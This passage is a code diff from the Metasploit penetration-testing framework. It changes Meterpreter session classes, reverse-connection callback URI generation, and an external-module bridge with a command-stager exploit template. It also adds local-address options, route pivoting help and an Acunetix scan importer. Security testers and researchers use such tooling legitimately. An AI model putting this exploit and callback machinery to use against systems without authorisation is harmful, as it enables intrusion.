false
|
||||
end
|
|
@ -11,6 +11,12 @@ module Sessions
|
|||
#
|
||||
###
|
||||
class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'linux'
|
||||
|
|
|
@ -1,29 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/meterpreter'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x86_Mettle_Linux < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'linux'
|
||||
self.base_arch = ARCH_X86
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -1,22 +1,75 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/uuid/options'
|
||||
require 'base64'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
module MettleConfig
|
||||
module Sessions
|
||||
module MettleConfig
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
|
||||
def generate_uri(opts={})
|
||||
ds = opts[:datastore] || datastore
|
||||
uri_req_len = ds['StagerURILength'].to_i
|
||||
|
||||
# Choose a random URI length between 30 and 128 bytes
|
||||
if uri_req_len == 0
|
||||
uri_req_len = 30 + luri.length + rand(127 - (30 + luri.length))
|
||||
end
|
||||
|
||||
if uri_req_len < 5
|
||||
raise ArgumentError, "Minimum StagerURILength is 5"
|
||||
end
|
||||
|
||||
generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid])
|
||||
end
|
||||
|
||||
def generate_http_uri(opts)
|
||||
if Rex::Socket.is_ipv6?(opts[:lhost])
|
||||
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
|
||||
else
|
||||
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
|
||||
end
|
||||
|
||||
target_uri << ':'
|
||||
target_uri << opts[:lport].to_s
|
||||
target_uri << luri
|
||||
target_uri << generate_uri(opts)
|
||||
target_uri
|
||||
end
|
||||
|
||||
def generate_tcp_uri(opts)
|
||||
if Rex::Socket.is_ipv6?(opts[:lhost])
|
||||
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
|
||||
else
|
||||
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
|
||||
end
|
||||
target_uri << ':'
|
||||
target_uri << opts[:lport].to_s
|
||||
target_uri
|
||||
end
|
||||
|
||||
def generate_config(opts={})
|
||||
transport = transport_config_reverse_tcp(opts)
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
case opts[:scheme]
|
||||
when 'http'
|
||||
transport = transport_config_reverse_http(opts)
|
||||
opts[:uri] = generate_http_uri(transport)
|
||||
when 'https'
|
||||
transport = transport_config_reverse_https(opts)
|
||||
opts[:uri] = generate_http_uri(transport)
|
||||
when 'tcp'
|
||||
transport = transport_config_reverse_tcp(opts)
|
||||
opts[:uri] = generate_tcp_uri(transport)
|
||||
else
|
||||
raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
|
||||
end
|
||||
opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
|
||||
opts[:uri] ||= "#{transport[:scheme]}://#{transport[:lhost]}:#{transport[:lport]}"
|
||||
opts.slice(:uuid, :uri, :debug, :log_file)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -194,6 +194,8 @@ module Exploit::Remote::SMTPDeliver
|
|||
full_msg << date unless data =~ /date: /i
|
||||
full_msg << subject unless subject.nil? || data =~ /subject: /i
|
||||
full_msg << data
|
||||
# Escape leading dots in the mail messages so there are no false EOF
|
||||
full_msg.gsub!(/(?m)^\./, '..')
|
||||
send_status = raw_send_recv("#{full_msg}\r\n.\r\n", nsock)
|
||||
end
|
||||
else
|
||||
|
|
|
@ -45,7 +45,7 @@ module ReverseHttp
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LHOST', [true, 'The local listener hostname']),
|
||||
OptAddressLocal.new('LHOST', [true, 'The local listener hostname']),
|
||||
OptPort.new('LPORT', [true, 'The local listener port', 8080]),
|
||||
OptString.new('LURI', [false, 'The HTTP Path', ''])
|
||||
], Msf::Handler::ReverseHttp)
|
||||
|
|
|
@ -38,7 +38,7 @@ module ReverseHttpsProxy
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
|
||||
OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
|
||||
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
||||
OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]),
|
||||
OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]),
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
module Msf::Module::External
|
||||
def wait_status(mod)
|
||||
while mod.running
|
||||
m = mod.get_status
|
||||
if m
|
||||
case m['level']
|
||||
when 'error'
|
||||
print_error m['message']
|
||||
when 'warning'
|
||||
print_warning m['message']
|
||||
when 'good'
|
||||
print_good m['message']
|
||||
when 'info'
|
||||
print_status m['message']
|
||||
when 'debug'
|
||||
vprint_status m['message']
|
||||
else
|
||||
print_status m['message']
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -7,6 +7,10 @@ class Msf::Modules::External::Bridge
|
|||
|
||||
attr_reader :path, :running
|
||||
|
||||
def self.applies?(module_name)
|
||||
File::executable? module_name
|
||||
end
|
||||
|
||||
def meta
|
||||
@meta ||= describe
|
||||
end
|
||||
|
@ -34,6 +38,7 @@ class Msf::Modules::External::Bridge
|
|||
end
|
||||
|
||||
def initialize(module_path)
|
||||
self.env = {}
|
||||
self.running = false
|
||||
self.path = module_path
|
||||
end
|
||||
|
@ -41,7 +46,7 @@ class Msf::Modules::External::Bridge
|
|||
protected
|
||||
|
||||
attr_writer :path, :running
|
||||
attr_accessor :ios
|
||||
attr_accessor :env, :ios
|
||||
|
||||
def describe
|
||||
resp = send_receive(Msf::Modules::External::Message.new(:describe))
|
||||
|
@ -57,7 +62,7 @@ class Msf::Modules::External::Bridge
|
|||
end
|
||||
|
||||
def send(message)
|
||||
input, output, status = ::Open3.popen3([self.path, self.path])
|
||||
input, output, status = ::Open3.popen3(env, [self.path, self.path])
|
||||
self.ios = [input, output, status]
|
||||
case Rex::ThreadSafe.select(nil, [input], nil, 0.1)
|
||||
when nil
|
||||
|
@ -98,3 +103,31 @@ class Msf::Modules::External::Bridge
|
|||
[input, output].each {|fd| fd.close rescue nil} # Yeah, yeah. I know.
|
||||
end
|
||||
end
|
||||
|
||||
class Msf::Modules::External::PyBridge < Msf::Modules::External::Bridge
|
||||
def self.applies?(module_name)
|
||||
module_name.match? /\.py$/
|
||||
end
|
||||
|
||||
def initialize(module_path)
|
||||
super
|
||||
pythonpath = ENV['PYTHONPATH'] || ''
|
||||
self.env = self.env.merge({ 'PYTHONPATH' => pythonpath + File::PATH_SEPARATOR + File.expand_path('../python', __FILE__) })
|
||||
end
|
||||
end
|
||||
|
||||
class Msf::Modules::External::Bridge
|
||||
|
||||
LOADERS = [
|
||||
Msf::Modules::External::PyBridge,
|
||||
Msf::Modules::External::Bridge
|
||||
]
|
||||
|
||||
def self.open(module_path)
|
||||
LOADERS.each do |klass|
|
||||
return klass.new module_path if klass.applies? module_path
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
import sys, os, json
|
||||
|
||||
def log(message, level='info'):
|
||||
print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
|
||||
'level': level,
|
||||
'message': message
|
||||
}}))
|
||||
sys.stdout.flush()
|
||||
|
||||
def run(metadata, exploit):
|
||||
req = json.loads(os.read(0, 10000))
|
||||
if req['method'] == 'describe':
|
||||
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
|
||||
elif req['method'] == 'run':
|
||||
args = req['params']
|
||||
exploit(args)
|
||||
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
|
||||
'message': 'Exploit completed'
|
||||
}}))
|
||||
sys.stdout.flush()
|
|
@ -4,98 +4,56 @@ require 'msf/core/modules/external/bridge'
|
|||
|
||||
class Msf::Modules::External::Shim
|
||||
def self.generate(module_path)
|
||||
mod = Msf::Modules::External::Bridge.new(module_path)
|
||||
mod = Msf::Modules::External::Bridge.open(module_path)
|
||||
return '' unless mod.meta
|
||||
case mod.meta['type']
|
||||
when 'remote_exploit.cmd_stager.wget'
|
||||
when 'remote_exploit_cmd_stager'
|
||||
remote_exploit_cmd_stager(mod)
|
||||
end
|
||||
end
|
||||
|
||||
def self.remote_exploit_cmd_stager(mod)
|
||||
%Q|
|
||||
require 'msf/core/modules/external/bridge'
|
||||
def self.render_template(name, meta = {})
|
||||
template = File.join(File.dirname(__FILE__), 'templates', name)
|
||||
ERB.new(File.read(template)).result(binding)
|
||||
end
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
def self.common_metadata(meta = {})
|
||||
render_template('common_metadata.erb', meta)
|
||||
end
|
||||
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => #{mod.meta['name'].dump},
|
||||
'Description' => #{mod.meta['description'].dump},
|
||||
'Author' =>
|
||||
[
|
||||
#{mod.meta['authors'].map(&:dump).join(', ')}
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
#{mod.meta['references'].map do |r|
|
||||
def self.mod_meta_common(mod, meta = {})
|
||||
meta[:path] = mod.path.dump
|
||||
meta[:name] = mod.meta['name'].dump
|
||||
meta[:description] = mod.meta['description'].dump
|
||||
meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ")
|
||||
meta[:date] = mod.meta['date'].dump
|
||||
meta[:references] = mod.meta['references'].map do |r|
|
||||
"[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
|
||||
end.join(', ')}
|
||||
],
|
||||
'DisclosureDate' => #{mod.meta['date'].dump},
|
||||
'Privileged' => #{mod.meta['privileged'].inspect},
|
||||
'Platform' => [#{mod.meta['targets'].map{|t| t['platform'].dump}.uniq.join(', ')}],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
#{mod.meta['targets'].map do |t|
|
||||
%Q^[#{t['platform'].dump} + ' ' + #{t['arch'].dump},
|
||||
{'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]^
|
||||
end.join(', ')}
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => 5 }
|
||||
))
|
||||
end.join(",\n ")
|
||||
|
||||
register_options([
|
||||
#{mod.meta['options'].map do |n, o|
|
||||
meta[:options] = mod.meta['options'].map do |n, o|
|
||||
"Opt#{o['type'].capitalize}.new(#{n.dump},
|
||||
[#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
|
||||
end.join(', ')}
|
||||
], self.class)
|
||||
end.join(",\n ")
|
||||
meta
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
mod = Msf::Modules::External::Bridge.new(#{mod.path.dump})
|
||||
mod.run(datastore.merge(command: cmd))
|
||||
wait_status(mod)
|
||||
true
|
||||
def self.mod_meta_exploit(mod, meta = {})
|
||||
meta[:wfsdelay] = mod.meta['wfsdelay'] || 5
|
||||
meta[:privileged] = mod.meta['privileged'].inspect
|
||||
meta[:platform] = mod.meta['targets'].map do |t|
|
||||
t['platform'].dump
|
||||
end.uniq.join(",\n ")
|
||||
meta[:targets] = mod.meta['targets'].map do |t|
|
||||
"[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]"
|
||||
end.join(",\n ")
|
||||
meta
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Exploiting...")
|
||||
execute_cmdstager({:flavor => :wget})
|
||||
end
|
||||
|
||||
def wait_status(mod)
|
||||
while mod.running
|
||||
m = mod.get_status
|
||||
if m
|
||||
case m['level']
|
||||
when 'error'
|
||||
print_error m['message']
|
||||
when 'warning'
|
||||
print_warning m['message']
|
||||
when 'good'
|
||||
print_good m['message']
|
||||
when 'info'
|
||||
print_status m['message']
|
||||
when 'debug'
|
||||
vprint_status m['message']
|
||||
else
|
||||
print_status m['message']
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
||||
def self.remote_exploit_cmd_stager(mod)
|
||||
meta = mod_meta_common(mod)
|
||||
meta = mod_meta_exploit(mod, meta)
|
||||
meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump
|
||||
render_template('remote_exploit_cmd_stager.erb', meta)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,7 @@
|
|||
'Name' => <%= meta[:name] %>,
|
||||
'Description' => <%= meta[:description] %>,
|
||||
'Author' =>
|
||||
[
|
||||
<%= meta[:authors] %>
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
|
@ -0,0 +1,48 @@
|
|||
require 'msf/core/modules/external/bridge'
|
||||
require 'msf/core/module/external'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Module::External
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
<%= common_metadata meta %>
|
||||
'References' =>
|
||||
[
|
||||
<%= meta[:references] %>
|
||||
],
|
||||
'DisclosureDate' => <%= meta[:date] %>,
|
||||
'Privileged' => <%= meta[:privileged] %>,
|
||||
'Platform' => [<%= meta[:platform] %>],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
<%= meta[:targets] %>
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => <%= meta[:wfsdelay] %> }
|
||||
))
|
||||
|
||||
register_options([
|
||||
<%= meta[:options] %>
|
||||
])
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>)
|
||||
mod.run(datastore.merge(command: cmd))
|
||||
wait_status(mod)
|
||||
true
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Exploiting...")
|
||||
execute_cmdstager({:flavor => :<%= meta[:command_stager_flavor] %>})
|
||||
end
|
||||
end
|
|
@ -28,7 +28,7 @@ module Msf
|
|||
|
||||
# @return [OptAddress]
|
||||
def self.LHOST(default=nil, required=true, desc="The listen address")
|
||||
Msf::OptAddress.new(__method__.to_s, [ required, desc, default ])
|
||||
Msf::OptAddressLocal.new(__method__.to_s, [ required, desc, default ])
|
||||
end
|
||||
|
||||
# @return [OptPort]
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'network_interface'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# Network address option.
|
||||
#
|
||||
###
|
||||
class OptAddressLocal < OptAddress
|
||||
def normalize(value)
|
||||
return nil unless value.kind_of?(String)
|
||||
|
||||
if NetworkInterface.interfaces.include?(value)
|
||||
ip_address = NetworkInterface.addresses(value).values.flatten.collect{|x| x['addr']}.select do |addr|
|
||||
begin
|
||||
IPAddr.new(addr).ipv4?
|
||||
rescue IPAddr::InvalidAddressError => e
|
||||
false
|
||||
end
|
||||
end
|
||||
|
||||
return false if ip_address.blank?
|
||||
return ip_address.first
|
||||
end
|
||||
|
||||
return value
|
||||
end
|
||||
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
|
||||
|
||||
return true if NetworkInterface.interfaces.include?(value)
|
||||
|
||||
return super
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -7,6 +7,7 @@ module Msf
|
|||
autoload :OptBase, 'msf/core/opt_base'
|
||||
|
||||
autoload :OptAddress, 'msf/core/opt_address'
|
||||
autoload :OptAddressLocal, 'msf/core/opt_address_local'
|
||||
autoload :OptAddressRange, 'msf/core/opt_address_range'
|
||||
autoload :OptBool, 'msf/core/opt_bool'
|
||||
autoload :OptEnum, 'msf/core/opt_enum'
|
||||
|
|
|
@ -411,6 +411,10 @@ module Msf
|
|||
# Allow comma separated list of encoders so users can choose several
|
||||
encoder.split(',').each do |chosen_encoder|
|
||||
e = framework.encoders.create(chosen_encoder)
|
||||
if e.nil?
|
||||
cli_print "Skipping invalid encoder #{chosen_encoder}"
|
||||
next
|
||||
end
|
||||
e.datastore.import_options_from_hash(datastore)
|
||||
encoders << e if e
|
||||
end
|
||||
|
|
|
@ -827,10 +827,33 @@ class Core
|
|||
end
|
||||
|
||||
def cmd_route_help
|
||||
print_line "Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]"
|
||||
print_line
|
||||
print_line "Route traffic destined to a given subnet through a supplied session."
|
||||
print_line "The default comm is Local."
|
||||
print_line
|
||||
print_line "Usage:"
|
||||
print_line " route [add/remove] subnet netmask [comm/sid]"
|
||||
print_line " route [add/remove] cidr [comm/sid]"
|
||||
print_line " route [get] <host or network>"
|
||||
print_line " route [flush]"
|
||||
print_line " route [print]"
|
||||
print_line
|
||||
print_line "Subcommands:"
|
||||
print_line " add - make a new route"
|
||||
print_line " remove - delete a route; 'del' is an alias"
|
||||
print_line " flush - remove all routes"
|
||||
print_line " get - display the route for a given target"
|
||||
print_line " print - show all active routes"
|
||||
print_line
|
||||
print_line "Examples:"
|
||||
print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1"
|
||||
print_line " route add 192.168.0.0 255.255.255.0 1"
|
||||
print_line " route add 192.168.0.0/24 1"
|
||||
print_line
|
||||
print_line " Delete the above route"
|
||||
print_line " route remove 192.168.0.0/24 1"
|
||||
print_line " route del 192.168.0.0 255.255.255.0 1"
|
||||
print_line
|
||||
print_line " Display the route that would be used for the given host or network"
|
||||
print_line " route get 192.168.0.11"
|
||||
print_line
|
||||
end
|
||||
|
||||
|
|
|
@ -19,7 +19,7 @@ module Net # :nodoc:
|
|||
name = ""
|
||||
packetlen = packet.size
|
||||
while true
|
||||
raise ExpandError, "offset is greater than packet lenght!" if packetlen < (offset+1)
|
||||
raise ExpandError, "offset is greater than packet length!" if packetlen < (offset+1)
|
||||
len = packet.unpack("@#{offset} C")[0]
|
||||
|
||||
if len == 0
|
||||
|
|
|
@ -24,6 +24,7 @@ module Rex
|
|||
def start_document
|
||||
@parse_warnings = []
|
||||
@resolv_cache = {}
|
||||
@host_object = nil
|
||||
end
|
||||
|
||||
def start_element(name=nil,attrs=[])
|
||||
|
@ -32,9 +33,12 @@ module Rex
|
|||
@state[:current_tag][name] = true
|
||||
case name
|
||||
when "Scan" # Start of the thing.
|
||||
when "Name", "StartURL", "Banner", "Os"
|
||||
@state[:report_item] = {}
|
||||
when "Name", "StartURL", "StartTime", "Banner", "Os", "Text", "Severity", "CWE", "URL", "Parameter"
|
||||
@state[:has_text] = true
|
||||
when "LoginSequence" # Skipping for now
|
||||
when "ReportItem"
|
||||
@state[:report_item] = {}
|
||||
when "Crawler"
|
||||
record_crawler(attrs)
|
||||
when "FullURL"
|
||||
|
@ -62,14 +66,56 @@ module Rex
|
|||
# StartURL does not always include the scheme
|
||||
@text.prepend("http://") unless URI.parse(@text).scheme
|
||||
collect_host
|
||||
collect_service
|
||||
collect_service_from_url
|
||||
@text = nil
|
||||
handle_parse_warnings &block
|
||||
host_object = report_host &block
|
||||
if host_object
|
||||
report_starturl_service(host_object,&block)
|
||||
db.report_import_note(@args[:wspace],host_object)
|
||||
@host_object = report_host &block
|
||||
if @host_object
|
||||
report_starturl_service(&block)
|
||||
db.report_import_note(@args[:wspace],@host_object)
|
||||
end
|
||||
when "StartTime"
|
||||
@state[:has_text] = false
|
||||
@state[:timestamp] = @text.to_s.tr!(',','').tr!('/','-')
|
||||
@text = nil
|
||||
when "Text"
|
||||
@state[:has_text] = false
|
||||
service = collect_service_from_kbitem_text
|
||||
@text = nil
|
||||
return unless service
|
||||
handle_parse_warnings &block
|
||||
if @host_object
|
||||
report_kbitem_service(service,&block)
|
||||
end
|
||||
when "Severity"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_severity
|
||||
@text = nil
|
||||
when "CWE"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_cwe
|
||||
@text = nil
|
||||
when "URL"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_reference_url
|
||||
@text = nil
|
||||
when "Parameter"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_parameter
|
||||
@text = nil
|
||||
when "ReportItem"
|
||||
vuln = collect_vuln_from_report_item
|
||||
if vuln.nil?
|
||||
@state[:page_request] = @state[:page_response] = nil
|
||||
return
|
||||
end
|
||||
handle_parse_warnings &block
|
||||
if @state[:vuln_info][:refs].nil?
|
||||
report_web_vuln(&block)
|
||||
else
|
||||
report_other_vuln(&block)
|
||||
end
|
||||
@state[:page_request] = @state[:page_response] = nil
|
||||
when "Banner"
|
||||
@state[:has_text] = false
|
||||
collect_and_report_banner
|
||||
|
@ -134,7 +180,7 @@ module Rex
|
|||
@report_data[:state] = Msf::HostState::Alive
|
||||
end
|
||||
|
||||
def collect_service
|
||||
def collect_service_from_url
|
||||
return unless @report_data[:host]
|
||||
return unless in_tag("Scan")
|
||||
return unless @text
|
||||
|
@ -146,6 +192,44 @@ module Rex
|
|||
@report_data[:ports] << @state[:starturl_port]
|
||||
end
|
||||
|
||||
def collect_service_from_kbitem_text
|
||||
return unless @host_object
|
||||
return unless in_tag("Scan")
|
||||
return unless in_tag("KBase")
|
||||
return unless in_tag("KBItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
return unless @text =~ /server is running/
|
||||
matched = / (?<name>\w+) server is running on (?<proto>\w+) port (?<portnum>\d+)\./.match(@text)
|
||||
@report_data[:ports] ||= []
|
||||
@report_data[:ports] << matched[:portnum]
|
||||
return matched
|
||||
end
|
||||
|
||||
def collect_vuln_from_report_item
|
||||
@state[:vuln_info] = nil
|
||||
return unless @host_object
|
||||
return unless in_tag("Scan")
|
||||
return unless in_tag("ReportItems")
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @state[:report_item][:name]
|
||||
return unless @state[:report_item][:severity]
|
||||
return unless @state[:report_item][:severity].downcase == "high"
|
||||
|
||||
@state[:vuln_info] = {}
|
||||
@state[:vuln_info][:name] = @state[:report_item][:name]
|
||||
if @state[:page_request_verb].nil? && @state[:report_item][:name] =~ /deprecated/
|
||||
# Treating this as a regular vuln, not web-specific
|
||||
@state[:vuln_info][:refs] = ["ACX-#{@state[:report_item][:reference_url]}"]
|
||||
unless @state[:report_item_cwe].nil?
|
||||
@state[:vuln_info][:refs][0] << ",#{@state[:report_item][:cwe]}"
|
||||
end
|
||||
end
|
||||
@state[:vuln_info][:severity] = @state[:report_item][:severity].downcase
|
||||
@state[:vuln_info][:cwe] = @state[:report_item][:cwe]
|
||||
return @state[:vuln_info]
|
||||
end
|
||||
|
||||
def collect_and_report_banner
|
||||
return unless (svc = @state[:starturl_service_object]) # Yes i want assignment
|
||||
return unless @text
|
||||
|
@ -165,7 +249,37 @@ module Rex
|
|||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item] = @text
|
||||
@state[:report_item][:name] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_severity
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:severity] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_cwe
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:cwe] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_reference_url
|
||||
return unless in_tag("ReportItem")
|
||||
return unless in_tag("References")
|
||||
return unless in_tag("Reference")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:reference_url] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_parameter
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:parameter] = @text
|
||||
end
|
||||
|
||||
# @state[:fullurl] is set by report_web_site
|
||||
|
@ -211,20 +325,26 @@ module Rex
|
|||
def report_web_page(&block)
|
||||
return if should_skip_this_page
|
||||
return unless @state[:web_site]
|
||||
@state[:page_request_verb] = nil
|
||||
return unless @state[:page_request]
|
||||
return if @state[:page_request].strip.empty?
|
||||
return unless @state[:page_response]
|
||||
return if @state[:page_response].strip.empty?
|
||||
path,query_string = parse_request(@state[:page_request])
|
||||
verb,path,query_string = parse_request(@state[:page_request])
|
||||
return unless path
|
||||
@state[:page_request_verb] = verb
|
||||
web_page_info = {}
|
||||
if @state[:page_response].strip.blank?
|
||||
web_page_info[:code] = ""
|
||||
web_page_info[:headers] = {}
|
||||
web_page_info[:body] = ""
|
||||
else
|
||||
parsed_response = parse_response(@state[:page_response])
|
||||
return unless parsed_response
|
||||
web_page_info = {}
|
||||
web_page_info[:web_site] = @state[:web_site]
|
||||
web_page_info[:path] = path
|
||||
web_page_info[:code] = parsed_response[:code].to_i
|
||||
web_page_info[:headers] = parsed_response[:headers]
|
||||
web_page_info[:body] = parsed_response[:body]
|
||||
end
|
||||
web_page_info[:web_site] = @state[:web_site]
|
||||
web_page_info[:path] = path
|
||||
web_page_info[:query] = query_string || ""
|
||||
url = ""
|
||||
url << @state[:web_site].service.name.to_s << "://"
|
||||
|
@ -234,13 +354,51 @@ module Rex
|
|||
return unless uri # Sanity checker
|
||||
db.emit(:web_page, url, &block) if block
|
||||
web_page_object = db_report(:web_page,web_page_info)
|
||||
@state[:page_request] = @state[:page_response] = nil
|
||||
@state[:web_page] = web_page_object
|
||||
end
|
||||
|
||||
def report_web_vuln(&block)
|
||||
return if should_skip_this_page
|
||||
return unless @state[:web_page]
|
||||
return unless @state[:web_site]
|
||||
return unless @state[:vuln_info]
|
||||
|
||||
web_vuln_info = {}
|
||||
web_vuln_info[:web_site] = @state[:web_site]
|
||||
web_vuln_info[:path] = @state[:web_page][:path]
|
||||
web_vuln_info[:query] = @state[:web_page][:query]
|
||||
web_vuln_info[:method] = @state[:page_request_verb]
|
||||
web_vuln_info[:pname] = ""
|
||||
if @state[:page_response].blank?
|
||||
web_vuln_info[:proof] = "<empty response>"
|
||||
else
|
||||
web_vuln_info[:proof] = @state[:page_response]
|
||||
end
|
||||
web_vuln_info[:risk] = 5
|
||||
web_vuln_info[:params] = []
|
||||
unless @state[:report_item][:parameter].blank?
|
||||
# Acunetix only lists a single paramter...
|
||||
web_vuln_info[:params] << [ @state[:report_item][:parameter].to_s, "" ]
|
||||
end
|
||||
web_vuln_info[:category] = "imported"
|
||||
web_vuln_info[:confidence] = 100
|
||||
web_vuln_info[:name] = @state[:vuln_info][:name]
|
||||
|
||||
db.emit(:web_vuln, web_vuln_info[:name], &block) if block
|
||||
vuln = db_report(:web_vuln, web_vuln_info)
|
||||
end
|
||||
|
||||
def report_other_vuln(&block)
|
||||
return if should_skip_this_page
|
||||
return unless @state[:vuln_info]
|
||||
|
||||
db.emit(:vuln, @state[:vuln_info][:name], &block) if block
|
||||
db_report(:vuln, @state[:vuln_info].merge(:host => @host_object))
|
||||
end
|
||||
|
||||
# Reasons why we shouldn't collect a particular web page.
|
||||
def should_skip_this_page
|
||||
if @state[:report_item] =~ /Unrestricted File Upload/
|
||||
if @state[:report_item][:name] =~ /Unrestricted File Upload/
|
||||
# This means that the page being collected is something the
|
||||
# auditor put there, so it's not useful to report on.
|
||||
return true
|
||||
|
@ -259,6 +417,7 @@ module Rex
|
|||
return unless verb
|
||||
return unless req
|
||||
path,query_string = req.split(/\?/)[0,2]
|
||||
return verb,path,query_string
|
||||
end
|
||||
|
||||
def parse_response(response)
|
||||
|
@ -302,14 +461,14 @@ module Rex
|
|||
|
||||
# The service is super important, so we hang on to it for the
|
||||
# rest of the scan.
|
||||
def report_starturl_service(host_object,&block)
|
||||
return unless host_object
|
||||
def report_starturl_service(&block)
|
||||
return unless @host_object
|
||||
return unless @state[:starturl_uri]
|
||||
name = @state[:starturl_uri].scheme
|
||||
port = @state[:starturl_uri].port
|
||||
addr = host_object.address
|
||||
addr = @host_object.address
|
||||
svc = {
|
||||
:host => host_object,
|
||||
:host => @host_object,
|
||||
:port => port,
|
||||
:name => name.dup,
|
||||
:proto => "tcp"
|
||||
|
@ -320,6 +479,22 @@ module Rex
|
|||
end
|
||||
end
|
||||
|
||||
def report_kbitem_service(service,&block)
|
||||
return unless @host_object
|
||||
return unless @state[:starturl_uri]
|
||||
addr = @host_object.address
|
||||
svc = {
|
||||
:host => @host_object,
|
||||
:port => service[:portnum].to_i,
|
||||
:name => service[:name].dup.downcase,
|
||||
:proto => service[:proto].dup.downcase
|
||||
}
|
||||
if service[:name] and service[:portnum]
|
